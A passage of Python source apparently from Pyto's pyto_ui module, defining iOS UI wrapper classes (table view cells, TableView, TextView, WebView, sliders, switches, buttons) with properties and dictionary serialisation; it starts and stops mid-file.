return self.__py_view__.removable
@removable.setter
def removable(self, new_value: bool):
self.__py_view__.removable = new_value
_content_view = None
@property
def content_view(self) -> View:
"""
(Read Only) The view contained in the cell. Custom views should be added inside it.
:rtype: View
"""
if self._content_view is not None:
return self._content_view
_view = View()
_view.__py_view__ = self.__py_view__.contentView
self._content_view = _view
_view.__py_view__.retainReference()
_view.__py_view__.retain()
return _view
_image_view = None
@property
def image_view(self) -> ImageView:
"""
(Read Only) The view containing an image. May return ``None`` for some `Table View Cell Style <constants.html#table-view-cell-style>`_ values.
:rtype: Image View
"""
if self._image_view is not None:
return self._image_view
view = self.__py_view__.imageView
if view is None:
return None
else:
_view = ImageView()
_view.__py_view__ = view
self._image_view = _view
view.retainReference()
return _view
_text_label = None
@property
def text_label(self) -> Label:
"""
(Read Only) The label containing the main text of the cell.
:rtype: Label
"""
if self._text_label is not None:
return self._text_label
view = self.__py_view__.textLabel
if view is None:
return None
else:
_view = Label()
_view.__py_view__ = view
self._text_label = _view
view.retainReference()
view.retain()
return _view
_detail_text_label = None
@property
def detail_text_label(self) -> Label:
"""
(Read Only) The label containing secondary text. May return ``None`` for some `Table View Cell Style <constants.html#table-view-cell-style>`_ values.
:rtype: Label
"""
if self._detail_text_label is not None:
return self._detail_text_label
view = self.__py_view__.detailLabel
if view is None:
return None
else:
_view = Label()
_view.__py_view__ = view
self._detail_text_label = _view
view.retainReference()
view.retain()
return _view
@property
def accessory_type(self) -> ACCESSORY_TYPE:
"""
The type of accessory view placed to the right of the cell. See `Accessory Type <constants.html#accessory_type>`_ constants for possible values.
:rtype: `Accessory Type <constants.html#accessory_type>`_.
"""
return self.__py_view__.accessoryType
@accessory_type.setter
def accessory_type(self, new_value: ACCESSORY_TYPE):
self.__py_view__.accessoryType = new_value
class TableView(View):
"""
A view containing a list of cells.
A Table View has a list of :class:`TableViewSection` objects that represent groups of cells. A Table View has two possible styles. See `Table View Style <constants.html#table-view-style>`_.
"""
def dictionary_representation(self):
d = super().dictionary_representation()
sections = []
for section in self.sections:
sections.append(section.dictionary_representation())
d["TableView"] = {
"sections": sections
}
return d
def configure_from_dictionary(self, dictionary):
super().configure_from_dictionary(dictionary)
try:
dictionary = dictionary["TableView"]
except KeyError:
return
if "sections" in dictionary and dictionary["sections"] is not None:
sections = []
for section in dictionary["sections"]:
_section = TableViewSection()
_section._parent = self._parent
_section.configure_from_dictionary(section)
sections.append(_section)
self.sections = sections
def __init__(
self,
style: TABLE_VIEW_STYLE = __v__("TABLE_VIEW_STYLE_PLAIN"),
sections: List[TableViewSection] = [],
):
if style == "TABLE_VIEW_STYLE_PLAIN":
self.__py_view__ = __PyTableView__.newViewWithStyle(TABLE_VIEW_STYLE_PLAIN)
else:
self.__py_view__ = __PyTableView__.newViewWithStyle(style)
self.__py_view__.managedValue = _values.value(self)
self.sections = sections
self._setup_subclass()
@property
def reload_action(self) -> Callable[TableView, None]:
"""
A function called when the button item is pressed. Takes the button item as parameter.
:rtype: Callable[[TableView], None]
"""
action = self.__py_view__.reloadAction
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@reload_action.setter
def reload_action(self, new_value: Callable[[TableView], None]):
if new_value is None:
self.__py_view__.action = None
else:
self.__py_view__.reloadAction = _values.value(new_value)
@property
def edit_button_item(self) -> ButtonItem:
"""
Returns a bar button item that toggles its title and associated state between Edit and Done.
The button item is setup to edit the Table View.
:rtype: ButtonItem
"""
item = ButtonItem()
item.__py_item__ = self.__py_view__.editButtonItem
return item
@property
def sections(self) -> List[TableViewSection]:
"""
A list of :class:`TableViewSection` containg cells to be displayed on the Table View.
Setting a new value will reload automatically the contents of the Table View.
:rtype: List[TableViewSection]
"""
sections = self.__py_view__.sections
py_sections = []
for section in sections:
py_section = TableViewSection("", [])
py_section.__py_section__ = section
py_sections.append(py_section)
return py_sections
@sections.setter
def sections(self, new_value: List[TableViewSection]):
sections = []
for section in new_value:
section.__py_section__.tableView = self.__py_view__
sections.append(section.__py_section__)
self.__py_view__.sections = sections
def deselect_row(self):
"""
Deselects the current selected row.
"""
self.__py_view__.deselectRowAnimated(True)
class TextView(View):
"""
An editable, multiline and scrollable view containing text.
"""
def __init__(self, text=""):
self.__py_view__ = __PyTextView__.newView()
self.__py_view__.managedValue = _values.value(self)
self.text = text
self._setup_subclass()
def configure_from_dictionary(self, dictionary):
super().configure_from_dictionary(dictionary)
try:
dictionary = dictionary["TextView"]
except KeyError:
return
def get(key, _dict=dictionary, default=None):
return self._get(_dict, default)
self.selected_range = tuple(get("selected_range", default=[]))
self.text = get("text", default="")
self.editable = get("editable", default=True)
self.selectable = get("selectable", default=True)
self.smart_quotes = get("smart_quotes", default=True)
self.smart_dashes = get("smart_dashes", default=True)
self.autocorrection = get("autocorrection", default=True)
self.secure = get("secure", default=False)
if get("html") is not None:
self.load_html(get("html"))
if get("color") is not None:
color = Color.__new__(Color)
color.configure_from_dictionary(get("color"))
self.text_color = color
if get("font") is not None:
font = Font.__new__(Font)
font.configure_from_dictionary(get("font"))
self.font = font
text_alignment = get("text_alignment")
if text_alignment is not None:
name = "TEXT_ALIGNMENT_"+(text_alignment.upper())
self.text_alignment = globals()[name]
keyboard_type = get("keyboard_type")
if keyboard_type is not None:
name = "KEYBOARD_TYPE_"+(keyboard_type.upper())
self.keyboard_type = globals()[name]
keyboard_appearance = get("keyboard_appearance")
if keyboard_appearance is not None:
name = "KEYBOARD_APPEARANCE__"+(keyboard_appearance.upper())
self.keyboard_appearance = globals()[name]
autocapitalization_type = get("autocapitalization_type")
if autocapitalization_type is not None:
name = "AUTO_CAPITALIZE_"+(autocapitalization_type.upper())
self.autocapitalization_type = globals()[name]
return_key_type = get("return_key_type")
if return_key_type is not None:
name = "RETURN_KEY_TYPE_"+(return_key_type.upper())
self.return_key_type = globals()[name]
def dictionary_representation(self):
r = super().dictionary_representation()
text_view = {
"selected_range": self.selected_range,
"text": self.text,
"editable": self.editable,
"selectable": self.selectable,
"smart_quotes": self.smart_quotes,
"smart_dashes": self.smart_dashes,
"autocorrection": self.autocorrection,
"secure": self.secure
}
if self._html is not None:
text_view["html"] = self._html
if self.text_color is not None:
text_view["color"] = self.text_color.dictionary_representation()
if self.font is not None:
text_view["font"] = self.font.dictionary_representation()
for key in list(globals().keys()).copy():
if key.startswith("TEXT_ALIGNMENT_") and globals()[key] == self.text_alignment:
text_view["alignment"] = key.split("TEXT_ALIGNMENT_")[1].lower()
for key in list(globals().keys()).copy():
if key.startswith("KEYBOARD_TYPE_") and globals()[key] == self.keyboard_type:
text_view["keyboard_type"] = key.split("KEYBOARD_TYPE_")[1].lower()
for key in list(globals().keys()).copy():
if key.startswith("KEYBOARD_APPEARANCE__") and globals()[key] == self.keyboard_appearance:
text_view["keyboard_appearance"] = key.split("KEYBOARD_APPEARANCE__")[1].lower()
for key in list(globals().keys()).copy():
if key.startswith("AUTO_CAPITALIZE_") and globals()[key] == self.autocapitalization_type:
text_view["autocapitalization_type"] = key.split("AUTO_CAPITALIZE_")[1].lower()
for key in list(globals().keys()).copy():
if key.startswith("RETURN_KEY_TYPE_") and globals()[key] == self.return_key_type:
text_view["return_key_type"] = key.split("RETURN_KEY_TYPE_")[1].lower()
r["TextView"] = text_view
return r
@property
def selected_range(self) -> Tuple[int, int]:
"""
Returns the selected text range. A tuple of two integers (start, end).
:rtype: Tuple[int, int]
"""
return (int(self.__py_view__.range[0]), int(self.__py_view__.range[1]))
@property
def did_begin_editing(self) -> Callable[[TextView], None]:
"""
A function called when the Text View begins editing. Takes the sender Text View as parameter.
:rtype: Callable[[TextView], None]
"""
action = self.__py_view__.didBeginEditing
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_begin_editing.setter
def did_begin_editing(self, new_value: Callable[[TextView], None]):
if new_value is None:
self.__py_view__.didBeginEditing = None
else:
self.__py_view__.didBeginEditing = _values.value(new_value)
@property
def did_end_editing(self) -> Callable[[TextView], None]:
"""
A function called when the Text View ends editing. Takes the sender Text View as parameter.
:rtype: Callable[[TextView], None]
"""
action = self.__py_view__.didEndEditing
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_end_editing.setter
def did_end_editing(self, new_value: Callable[[TextView], None]):
if new_value is None:
self.__py_view__.didEndEditing = None
else:
self.__py_view__.didEndEditing = _values.value(new_value)
@property
def did_change(self) -> Callable[[TextView], None]:
"""
A function called when the Text View's text changes. Takes the sender Text View as parameter.
:rtype: Callable[[TextView], None]
"""
action = self.__py_view__.didChangeText
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_change.setter
def did_change(self, new_value: Callable[[TextView], None]):
if new_value is None:
self.__py_view__.didChangeText = None
else:
self.__py_view__.didChangeText = _values.value(new_value)
_html = None
def load_html(self, html):
"""
Loads HTML in the Text View.
:param html: The HTML code to load.
"""
self._html = html
self.__py_view__.loadHTML(html)
@property
def text(self) -> str:
"""
The text contained in the view.
:rtype: str
"""
return str(self.__py_view__.text)
@text.setter
def text(self, new_value: str):
self.__py_view__.text = new_value
@property
def editable(self) -> bool:
"""
A boolean indicating whether the text is editable.
:rtype: bool
"""
return self.__py_view__.editable
@editable.setter
def editable(self, new_value: bool):
self.__py_view__.editable = new_value
@property
def selectable(self) -> bool:
"""
A boolean indicating whether the text is selectable.
:rtype: bool
"""
return self.__py_view__.selectable
@selectable.setter
def selectable(self, new_value: bool):
self.__py_view__.selectable = new_value
@property
def text_color(self) -> Color:
"""
The color of the text displayed on screen.
:rtype: pyto_ui.Color
"""
c = self.__py_view__.textColor
if c is None:
return None
else:
return Color(c)
@text_color.setter
def text_color(self, new_value: Color):
if new_value is None:
self.__py_view__.textColor = None
else:
self.__py_view__.textColor = new_value.__py_color__
@property
def font(self) -> Font:
"""
The font of the text displayed on screen.
:rtype: pyto_ui.Font
"""
py_font = self.__py_view__.font
if py_font is None:
return None
font = Font(None, None)
font.__ui_font__ = py_font
return font
@font.setter
def font(self, new_value: Font):
if new_value is None:
self.__py_view__.font = None
else:
self.__py_view__.font = new_value.__ui_font__
@property
def text_alignment(self) -> TEXT_ALIGNMENT:
"""
The alignment of the text displayed on screen. See `Text Alignment <constants.html#text-alignment>`_ constants for possible values.
:rtype: `Text Alignment <constants.html#text-alignment>`_
"""
return self.__py_view__.textAlignment
@text_alignment.setter
def text_alignment(self, new_value: TEXT_ALIGNMENT):
self.__py_view__.textAlignment = new_value
@property
def smart_dashes(self) -> bool:
"""
A boolean indicating whether smart dashes are enabled.
:rtype: bool
"""
return self.__py_view__.smartDashes
@smart_dashes.setter
def smart_dashes(self, new_value: bool):
self.__py_view__.smartDashes = new_value
@property
def smart_quotes(self) -> bool:
"""
A boolean indicating whether smart quotes are enabled.
:rtype: bool
"""
return self.__py_view__.smartQuotes
@smart_quotes.setter
def smart_quotes(self, new_value: bool):
self.__py_view__.smartQuotes = new_value
@property
def keyboard_type(self) -> KEYBOARD_TYPE:
"""
The type of keyboard to use while editing the text. See `Keyboard Type <constants.html#keyboard-type>`_ constants for possible values.
:rtype: `Keyboard Type <constants.html#keyboard-type>`_
"""
return self.__py_view__.keyboardType
@keyboard_type.setter
def keyboard_type(self, new_value: KEYBOARD_TYPE):
self.__py_view__.keyboardType = new_value
@property
def autocapitalization_type(self) -> AUTO_CAPITALIZE:
"""
The type of autocapitalization to use while editing th text. See `Auto Capitalization <constants.html#auto-capitalization>`_ constants for possible values.
:rtype: `Auto Capitalization <constants.html#auto-capitalization>`_
"""
return self.__py_view__.autocapitalizationType
@autocapitalization_type.setter
def autocapitalization_type(self, new_value: AUTO_CAPITALIZE):
self.__py_view__.autocapitalizationType = new_value
@property
def autocorrection(self) -> bool:
"""
A boolean indicating whether autocorrection is enabled.
:rtype: bool
"""
return self.__py_view__.autocorrection
@autocorrection.setter
def autocorrection(self, new_value: bool):
self.__py_view__.autocorrection = new_value
@property
def keyboard_appearance(self) -> KEYBOARD_APPEARANCE:
"""
The appearance of the keyboard used while editing the text. See `Keyboard Appearance <constants.html#keyboard-appearance>`_ constants for possible values.
:rtype: `Keyboard Appearance <constants.html#keyboard-appearance>`_
"""
return self.__py_view__.keyboardAppearance
@keyboard_appearance.setter
def keyboard_appearance(self, new_value: KEYBOARD_APPEARANCE):
self.__py_view__.keyboardAppearance = new_value
@property
def return_key_type(self) -> RETURN_KEY_TYPE:
"""
The type of return key to show on the keyboard used to edit the text. See `Return Key Type <constants.html#return-key-type>`_ constants for possible values.
:rtype: `Return Key Type <constants.html#return-key-type>`_
"""
return self.__py_view__.returnKeyType
@return_key_type.setter
def return_key_type(self, new_value: RETURN_KEY_TYPE):
self.__py_view__.returnKeyType = new_value
@property
def secure(self) -> bool:
"""
A boolean indicating whether the keyboard should be configured to enter sensitive data.
:rtype: bool
"""
return self.__py_view__.isSecureTextEntry
@secure.setter
def secure(self, new_value: bool):
self.__py_view__.isSecureTextEntry = new_value
if "widget" not in os.environ:
class WebView(View):
"""
A View that displays web content.
"""
class JavaScriptException(Exception):
"""
An excpetion while running JavaScript code. Raised by :meth:`~pyto_ui.WebView.evaluate_js`.
"""
pass
def configure_from_dictionary(self, dictionary):
super().configure_from_dictionary(dictionary)
try:
dictionary = dictionary["WebView"]
except KeyError:
return
if "html" in dictionary and dictionary["html"] is not None:
try:
base_url = dictionary["base_url"]
except KeyError:
base_url = None
self.load_html(dictionary["html"], base_url=base_url)
elif "url" in dictionary and dictionary["url"] is not None:
self.load_url(dictionary["url"])
def dictionary_representation(self):
r = super().dictionary_representation()
web_view = {}
if self._url is not None:
web_view["url"] = self._url
elif self._html is not None:
web_view["html"] = self._html
web_view["base_url"] = self._base_url
r["WebView"] = web_view
return r
def __init__(self, url: str = None):
self.__py_view__ = __PyWebView__.newView()
self._setup_subclass()
self.__py_view__.managedValue = _values.value(self)
if callable(self.did_finish_loading):
self.__py_view__.didFinishLoading = _values.value(self.did_finish_loading)
if callable(self.did_fail_loading):
self.__py_view__.didFailLoading = _values.value(self.did_fail_loading)
if callable(self.did_start_loading):
self.__py_view__.didStartLoading = _values.value(self.did_start_loading)
if callable(self.did_receive_message):
self.__py_view__.didReceiveMessage = _values.value(self.did_receive_message)
if url is not None:
self.load_url(url)
def evaluate_js(self, code) -> str:
"""
Runs JavaScript code and returns a String representation of the evaluation result. Raises a :class:`~pyto_ui.WebView.JavaScriptException`.
:param code: JavaScript code to run.
:rtype: str
"""
code = NSString.alloc().initWithUTF8String(code.encode("utf-8"))
result = self.__py_view__.evaluateJavaScript(code)
code.release()
if result is None:
return None
else:
_result = str(result)
result = _result
if result.startswith("_VALUE_:"):
return result.replace("_VALUE_:", "", 1)
elif result.startswith("_ERROR_:"):
raise self.__class__.JavaScriptException(
result.replace("_ERROR_:", "", 1)
)
_url = None
def load_url(self, url: str):
"""
Loads an URL.
:param url: The URL to laod. Can be 'http://', 'https://' or 'file://'.
"""
self._url = url
self.__py_view__.loadURL(url)
def load_file_path(self, path: str):
"""
Loads a file.
:param path: The path of the file to load.
"""
url = str(NSURL.alloc().initFileURLWithPath(os.path.abspath(path)).absoluteString)
self._url = url
self.__py_view__.loadURL(url)
_html = None
_base_url = None
def load_html(self, html: str, base_url: str = None):
"""
Loads an HTML string.
:param html: The HTML code to load.
:param base_url: An optional URL used to resolve relative paths.
"""
baseURL = base_url
if baseURL is not None:
baseURL = str(base_url)
self._html = html
self._base_url = base_url
self.__py_view__.loadHTML(html, baseURL=baseURL)
def reload(self):
"""
Reloads the Web View.
"""
self.__py_view__.reload()
def stop(self):
"""
Stops loading content.
"""
self.__py_view__.stop()
def go_back(self):
"""
Goes back.
"""
self.__py_view__.goBack()
def go_forward(self):
"""
Goes forward.
"""
self.__py_view__.goForward()
@property
def can_go_back(self) -> bool:
"""
(Read Only) A boolean indicating whether :meth:`~pyto_ui.WebView.go_back` can be performed.
:rtype: bool
"""
return self.__py_view__.canGoBack
@property
def can_go_forward(self) -> bool:
"""
(Read Only) A boolean indicating whether :meth:`~pyto_ui.WebView.go_forward` can be performed.
:rtype: bool
"""
return self.__py_view__.canGoForward
@property
def is_loading(self) -> bool:
"""
(Read Only) A boolean indicating whether the Web View is loading content.
:rtype: bool
"""
return self.__py_view__.isLoading
@property
def url(self) -> str:
"""
(Read Only) The current URL loaded into the Web View.
:rtype: str
"""
url = self.__py_view__.url
if url is None:
return None
else:
return str(url)
def register_message_handler(self, name: str):
"""
Adds a script message handler.
Adding a script message handler with name name causes the JavaScript function ``window.webkit.messageHandlers.name.postMessage(messageBody)`` to be defined in all frames in all web views that use the user content controller.
:param name: The name of the message handler.
"""
self.__py_view__.registerMessageHandler(name)
@property
def did_receive_message(self) -> Callable[[WebView, str, object], None]:
"""
A function called when a script message is received from a webpage.
Takes the sender Web View, the name of the message and the content of the message as parameters.
The following example script shows how to send a message from a JavaScript page and how to receive it from the Web View.
.. highlight:: python
.. code-block:: python
import pyto_ui as ui
def did_receive_message(web_view, name, message):
print(name, message)
web_view = ui.WebView()
web_view.did_receive_message = did_receive_message
web_view.register_message_handler("webView")
web_view.load_html('''
<h1> Hello World </h1>
<script>
window.webkit.messageHandlers.webView.postMessage({foo:"bar"})
</script>
''')
ui.show_view(web_view, ui.PRESENTATION_MODE_SHEET)
:rtype: Callable[[WebView, str, object], None]
"""
action = self.__py_view__.didReceiveMessage
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_receive_message.setter
def did_receive_message(self, new_value: Callable[[WebView, str, object], None]):
if new_value is None:
self.__py_view__.didReceiveMessage = None
else:
self.__py_view__.didReceiveMessage = _values.value(new_value)
@property
def did_start_loading(self) -> Callable[[WebView], None]:
"""
A function called when the Web View starts loading contents. Takes the sender Web View as parameter.
:rtype: Callable[[WebView], None]
"""
action = self.__py_view__.didStartLoading
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_start_loading.setter
def did_start_loading(self, new_value: Callable[[WebView], None]):
if new_value is None:
self.__py_view__.didStartLoading = None
else:
self.__py_view__.didStartLoading = _values.value(new_value)
@property
def did_finish_loading(self) -> Callable[[WebView], None]:
"""
A function called when the Web View finished loading contents. Takes the sender Web View as parameter.
:rtype: Callable[[WebView], None]
"""
action = self.__py_view__.didFinishLoading
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_finish_loading.setter
def did_finish_loading(self, new_value: Callable[[WebView], None]):
if new_value is None:
self.__py_view__.didFinishLoading = None
else:
self.__py_view__.didFinishLoading = _values.value(new_value)
@property
def did_fail_loading(self) -> Callable[[WebView, str], None]:
"""
A function called when the Web View failed to load contents. Takes the sender Web View and a string describing the error as parameters.
:rtype: Callable[[WebView, str], None]
"""
action = self.__py_view__.didFailLoading
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_fail_loading.setter
def did_fail_loading(self, new_value: Callable[[WebView, str], None]):
if new_value is None:
self.__py_view__.didFailLoading = None
else:
self.__py_view__.didFailLoading = _values.value(new_value)
##################
# MARK: - Control Classes
##################
class Control(View):
"""
The base class for controls, which are visual elements that convey a specific action or intention in response to user interactions.
Inherited by :class:`Button`, :class:`SegmentedControl`, :class:`Slider`, :class:`Switch` and :class:`TextField`
"""
def __init__(self):
self.__py_view__ = __PyControl__.newView()
self._setup_subclass()
self.__py_view__.managedValue = _values.value(self)
if callable(self.action):
self.__py_view__.action = _values.value(self.action)
def configure_from_dictionary(self, dictionary):
super().configure_from_dictionary(dictionary)
def get(key, _dict=dictionary, default=None):
return self._get(key, _dict, default)
try:
dictionary = dictionary["Control"]
except KeyError:
return
if "enabled" in dictionary and dictionary["enabled"] is not None:
self.enabled = dictionary["enabled"]
horizontal_alignment = get("horizontal_alignment")
if horizontal_alignment is not None:
name = "HORIZONTAL_ALIGNMENT_"+(self.horizontal_alignment.upper())
self.horizontal_alignment = globals()[name]
vertical_alignment = get("vertical_alignment")
if vertical_alignment is not None:
name = "VERTICAL_ALIGNMENT_"+(self.vertical_alignment.upper())
self.vertical_alignment = globals()[name]
def dictionary_representation(self):
r = super().dictionary_representation()
control = {
"enabled": self.enabled
}
for key in list(globals().keys()).copy():
if key.startswith("HORIZONTAL_ALIGNMENT_") and globals()[key] == self.horizontal_alignment:
control["horizontal_alignment"] = key.split("HORIZONTAL_ALIGNMENT_")[1].lower()
for key in list(globals().keys()).copy():
if key.startswith("VERTICAL_ALIGNMENT_") and globals()[key] == self.vertical_alignment:
control["vertical_alignment"] = key.split("VERTICAL_ALIGNMENT_")[1].lower()
r["Control"] = control
return r
@property
def enabled(self) -> bool:
"""
A boolean indicating whether the control is enabled.
:rtype: bool
"""
return self.__py_view__.enabled
@enabled.setter
def enabled(self, new_value: bool):
self.__py_view__.enabled = new_value
@property
def horizontal_alignment(self) -> HORIZONTAL_ALIGNMENT:
"""
The horizontal alignment of the view's contents. See `Horizontal Alignment <constants.html#horizontal-alignment>`_ constants for possible values.
:rtype: `Horizontal Alignment <constants.html#horizontal-alignment>`_
"""
return self.__py_view__.contentHorizontalAlignment
@horizontal_alignment.setter
def horizontal_alignment(self, new_value: HORIZONTAL_ALIGNMENT):
self.__py_view__.contentHorizontalAlignment = new_value
@property
def vertical_alignment(self) -> VERTICAL_ALIGNMENT:
"""
The vertical alignment of the view's contents. See `Vertical Alignemnt <constants.html#vertical-alignment>`_ constants for possible values.
:rtype: `Vertical Alignment <constants.html#vertical-alignment>`_
"""
return self.__py_view__.contentVerticalAlignment
@vertical_alignment.setter
def vertical_alignment(self, new_value: VERTICAL_ALIGNMENT):
self.__py_view__.contentVerticalAlignment = new_value
@property
def action(self) -> Callable[[Control], None]:
"""
A function called when the control triggers its action.
For example, a :class:`Button` object calls this function when it's pressed.
Takes the :class:`Control` object as parameter.
:rtype: Callable[[Control], None]
"""
action = self.__py_view__.action
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@action.setter
def action(self, new_value: Callable[[Control], None]):
if new_value is None:
self.__py_view__.action = None
else:
self.__py_view__.action = _values.value(new_value)
class SegmentedControl(Control):
"""
A horizontal control made of multiple segments, each segment functioning as a discrete button.
The function passed to :data:`~pyto_ui.Control.action` will be called when the segmented control changes its selection.
"""
def __init__(self, segments: List[str] = []):
self.__py_view__ = __PySegmentedControl__.newView()
self._setup_subclass()
self.__py_view__.managedValue = _values.value(self)
self.segments = segments
def configure_from_dictionary(self, dictionary):
super().configure_from_dictionary(dictionary)
try:
dictionary = dictionary["SegmentedControl"]
except KeyError:
return
if "segments" in dictionary and dictionary["segments"] is not None:
self.segments = dictionary["segments"]
if "selection" in dictionary and dictionary["selection"] is not None:
self.selected_segment = dictionary["selection"]
def dictionary_representation(self):
r = super().dictionary_representation()
segmented_control = {
"segments": self.segments,
"selection": self.selected_segment
}
r["SegmentedControl"] = segmented_control
return r
@property
def segments(self) -> List[str]:
"""
A list of strings representing segments titles.
:rtype: List[str]
"""
return list(map(str, self.__py_view__.segments))
@segments.setter
def segments(self, new_value: List[str]):
self.__py_view__.segments = new_value
@property
def selected_segment(self) -> int:
"""
The index of selected segment.
:rtype: int
"""
return self.__py_view__.selectedSegmentIndex
@selected_segment.setter
def selected_segment(self, new_value: int):
self.__py_view__.selectedSegmentIndex = new_value
class Slider(Control):
"""
A control used to select a single value from a continuous range of values. The default range is located between ``0`` and ``1``.
The function passed to :data:`~pyto_ui.Control.action` will be called when the slider changes its value.
"""
def __init__(self, value: float = 0.5):
self.__py_view__ = __PySlider__.newView()
self._setup_subclass()
self.__py_view__.managedValue = _values.value(self)
self.value = value
def configure_from_dictionary(self, dictionary):
super().configure_from_dictionary()
try:
dictionary = dictionary["Slider"]
except KeyError:
return
def get(key, _dict=dictionary, default=None):
return self._get(key, _dict, default)
self.value = get("value", default=0)
self.minimum_value = get("min", default=0)
self.maximum_value = get("max", default=1)
if get("thumb_color") is not None:
thumb_color = Color.__new__(Color)
thumb_color.configure_from_dictionary(get("thumb_color"))
self.thumb_color = thumb_color
if get("maximum_track_color") is not None:
maximum_track_color = Color.__new__(Color)
maximum_track_color.configure_from_dictionary(get("maximum_track_color"))
self.maximum_track_color = maximum_track_color
if get("minimum_track_color") is not None:
minimum_track_color = Color.__new__(Color)
minimum_track_color.configure_from_dictionary(get("minimum_track_color"))
self.minimum_track_color = minimum_track_color
def dictionary_representation(self):
r = super().dictionary_representation()
slider = {
"value": self.value,
"min": self.minimum_value,
"max": self.maximum_value
}
if self.thumb_color is not None:
slider["thumb_color"] = self.thumb_color.dictionary_representation()
if self.maximum_track_color is not None:
slider["maximum_track_color"] = self.maximum_track_color.dictionary_representation()
if self.minimum_track_color is not None:
slider["minimum_track_color"] = self.minimum_track_color.dictionary_representation()
r["Slider"] = slider
return r
def set_value_with_animation(self, value: float):
"""
Sets the value of the slider with an animation.
:param value: The value of the slider.
"""
self.__py_view__.setValue(value, animated=True)
@property
def value(self) -> float:
"""
The value of the slider between its range.
:rtype: float
"""
return self.__py_view__.value
@value.setter
def value(self, new_value: float):
self.__py_view__.value = new_value
@property
def minimum_value(self) -> float:
"""
The minimum value of the slider.
:rtype: float
"""
return self.__py_view__.minimumValue
@minimum_value.setter
def minimum_value(self, new_value: float):
self.__py_view__.minimumValue = new_value
@property
def maximum_value(self) -> float:
"""
The maximum value of the slider.
:rtype: float
"""
return self.__py_view__.maximumValue
@maximum_value.setter
def maximum_value(self, new_value: float):
self.__py_view__.maximumValue = new_value
@property
def minimum_track_color(self) -> Color:
"""
The color used to tint the default minimum track.
:rtype: pyto_ui.Color
"""
c = self.__py_view__.minimumTrackColor
if c is None:
return None
else:
return Color(c)
@minimum_track_color.setter
def minimum_track_color(self, new_value: Color):
if new_value is None:
self.__py_view__.minimumTrackColor = None
else:
self.__py_view__.minimumTrackColor = new_value.__py_color__
@property
def maximum_track_color(self) -> Color:
"""
The color used to tint the default maximum track.
:rtype: pyto_ui.Color
"""
c = self.__py_view__.maximumTrackColor
if c is None:
return None
else:
return Color(c)
@maximum_track_color.setter
def maximum_track_color(self, new_value: Color):
if new_value is None:
self.__py_view__.maximumTrackColor = None
else:
self.__py_view__.maximumTrackColor = new_value.__py_color__
@property
def thumb_color(self) -> Color:
"""
The color used to tint the default thumb.
:rtype: pyto_ui.Color
"""
c = self.__py_view__.thumbColor
if c is None:
return None
else:
return Color(c)
@thumb_color.setter
def thumb_color(self, new_value: Color):
if new_value is None:
self.__py_view__.thumbColor = None
else:
self.__py_view__.thumbColor = new_value.__py_color__
class Switch(Control):
"""
A control that offers a binary choice, such as On/Off.
The function passed to :data:`~pyto_ui.Control.action` will be called when the switch changes its value.
"""
def __init__(self, on=False):
self.__py_view__ = __PySwitch__.newView()
self._setup_subclass()
self.__py_view__.managedValue = _values.value(self)
self.on = on
def configure_from_dictionary(self, dictionary):
super().configure_from_dictionary(dictionary)
try:
dictionary = dictionary["Switch"]
except KeyError:
return
if "on" in dictionary and dictionary["on"] is not None:
self.on = dictionary["on"]
if "on_color" in dictionary and dictionary["on_color"] is not None:
on_color = Color.__new__(Color)
on_color.configure_from_dictionary(dictionary["on_color"])
self.on_color = on_color
if "thumb_color" in dictionary and dictionary["thumb_color"] is not None:
thumb_color = Color.__new__(Color)
thumb_color.configure_from_dictionary(dictionary["thumb_color"])
self.thumb_color = thumb_color
def dictionary_representation(self):
r = super().dictionary_representation()
switch = {}
switch["on"] = self.on
if self.on_color is not None:
switch["on_color"] = self.on_color.dictionary_representation()
if self.thumb_color is not None:
switch["thumb_color"] = self.thumb_color.dictionary_representation()
r["Switch"] = switch
return r
def set_on_with_animation(self, on: bool):
"""
Sets the state of the switch to On or Off with an animation.
:param on: A boolean indicating whether the switch should be On.
"""
self.__py_view__.setOn(on, animated=True)
@property
def on(self) -> bool:
"""
A boolean indicating whether the switch is On.
:rtype: bool
"""
return self.__py_view__.isOn
@on.setter
def on(self, new_value: bool):
self.__py_view__.isOn = new_value
@property
def on_color(self) -> Color:
"""
The color used to tint the appearance of the switch when it is turned on.
:rtype: pyto_ui.Color
"""
c = self.__py_view__.onColor
if c is None:
return None
else:
return Color(c)
@on_color.setter
def on_color(self, new_value: Color):
if new_value is None:
self.__py_view__.onColor = None
else:
self.__py_view__.onColor = new_value.__py_color__
@property
def thumb_color(self) -> Color:
"""
The color used to tint the appearance of the thumb.
:rtype: pyto_ui.Color
"""
c = self.__py_view__.thumbColor
if c is None:
return None
else:
return Color(c)
@thumb_color.setter
def thumb_color(self, new_value: Color):
if new_value is None:
self.__py_view__.thumbColor = None
else:
self.__py_view__.thumbColor = new_value.__py_color__
class Button(Control):
"""
A control that executes your custom code in response to user interactions.
To add an action, set :data:`~pyto_ui.Control.action`.
For types of buttons, see `Button Type <constants.html#button-type>`_ constants.
"""
_button_type = None
def __init__(
self,
type: BUTTON_TYPE = __v__("BUTTON_TYPE_SYSTEM"),
title: str = "",
image: "Image" = None,
):
if type == "BUTTON_TYPE_SYSTEM":
self.__py_view__ = __PyButton__.newButtonWithType(BUTTON_TYPE_SYSTEM)
self._button_type = type
else:
self.__py_view__ = __PyButton__.newButtonWithType(type)
self.__py_view__.managedValue = _values.value(self)
self.title = title
self.image = image
self._setup_subclass()
def configure_from_dictionary(self, dictionary):
super().configure_from_dictionary(dictionary)
try:
dictionary = dictionary["Button"]
except KeyError:
return
def get(key, _dict=dictionary, default=None):
return self._get(key, _dict, default)
button_type = get("type")
if button_type is not None:
name = "BUTTON_TYPE_"+(button_type.upper())
self._button_type = globals()[name]
self.__py_view__ = __PyButton__.newButtonWithType(self._button_type)
self._setup_subclass()
self.title = get("title")
if get("color") is not None:
title_color = Color.__new__(Color)
title_color.configure_from_dictionary(get("color"))
self.title_color = title_color
if get("font") is not None:
font = Font.__new__(Font)
font.configure_from_dictionary(get("font"))
self.font = font
if get("image") is not None:
if os.path.isfile(get("image")):
self.image = Image.open(get("image"))
else:
self.image = image_with_system_name(get("image"))
def dictionary_representation(self):
r = super().dictionary_representation()
button = {
